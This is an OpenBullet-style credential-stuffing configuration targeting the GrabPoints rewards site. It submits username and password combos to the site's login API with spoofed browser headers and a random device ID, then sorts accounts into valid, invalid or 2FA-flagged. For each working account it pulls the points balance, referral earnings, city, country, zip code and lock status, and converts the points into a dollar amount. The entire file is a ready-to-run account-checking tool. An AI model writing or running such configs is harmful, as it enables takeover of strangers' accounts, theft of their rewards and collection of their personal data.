[SETTINGS]
{
  "Name": "grabpoints for github",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-02-02T18:58:50.5727325+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "UHQKarma",
  "Version": "1.2.1",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
BEGIN SCRIPT JavaScript
function createGuid(){  
   function S4() {  
      return (((1+Math.random())*0x10000)|0).toString(16).substring(1);  
   }  
   return (S4() + S4() + "-" + S4() + "-4" + S4().substr(0,3) + "-" + S4() + "-" + S4() + S4() + S4()).toLowerCase();  
}  
var ID = createGuid(); 
END SCRIPT -> VARS "ID"

FUNCTION Length "{\"address\":{},\"avatarURL\":\"/assets/i/avatar/default.png\",\"state\":\"auth\",\"userName\":\"<USER>\",\"password\":\"<PASS>\",\"passwordVerification\":\"\",\"newPassword\":\"\"}" -> VAR "l" 

REQUEST POST "https://api.grabpoints.com/login" 
  CONTENT "{\"address\":{},\"avatarURL\":\"/assets/i/avatar/default.png\",\"state\":\"auth\",\"userName\":\"<USER>\",\"password\":\"<PASS>\",\"passwordVerification\":\"\",\"newPassword\":\"\"}" 
  CONTENTTYPE "application/vnd-v4.0+json" 
  HEADER "Host: api.grabpoints.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Content-Type: application/vnd-v4.0+json" 
  HEADER "X-GP-ACCESS-TOKEN: null" 
  HEADER "X-Device-OS-ID: <ID>" 
  HEADER "X-Device-Time-Zone: Europe/London" 
  HEADER "Content-Length: <l>" 
  HEADER "Origin: https://members.grabpoints.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Referer: https://members.grabpoints.com/" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "bad credentials" 
  KEYCHAIN Success OR 
    KEY "\"principal\"" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "Your account has been flagged for suspicious access. Please click the Help button below to troubleshoot further" 
    KEY "ACCESS_DENIED" 

PARSE "<SOURCE>" JSON "accessToken" -> VAR "accessToken" 

REQUEST GET "https://api.grabpoints.com/api/customer" 
  
  HEADER "Host: api.grabpoints.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Content-Type: application/vnd-v4.0+json" 
  HEADER "X-GP-ACCESS-TOKEN: <accessToken>" 
  HEADER "X-Device-OS-ID: <ID>" 
  HEADER "X-Device-Time-Zone: Asia/Kolkata" 
  HEADER "Origin: https://members.grabpoints.com" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Referer: https://members.grabpoints.com/" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept-Encoding: gzip, deflate" 

PARSE "<SOURCE>" JSON "points" CreateEmpty=FALSE -> CAP "points" 

PARSE "<SOURCE>" JSON "referralsEarnings" CreateEmpty=FALSE -> CAP "referralsEarnings" 

PARSE "<SOURCE>" JSON "city" CreateEmpty=FALSE -> CAP "city" 

PARSE "<SOURCE>" JSON "countryCode" CreateEmpty=FALSE -> CAP "countryCode" 

PARSE "<SOURCE>" JSON "locked" CreateEmpty=FALSE -> CAP "locked" 

PARSE "<SOURCE>" JSON "zip" CreateEmpty=FALSE -> CAP "zip" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<points>" GreaterThan "1" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<points>" EqualTo "0" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<locked>" Contains "False" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "<locked>" Contains "True" 

FUNCTION Compute "<points>/1000" -> VAR "d" 

FUNCTION Constant "$<d>" -> CAP "Amount In Dollars" 

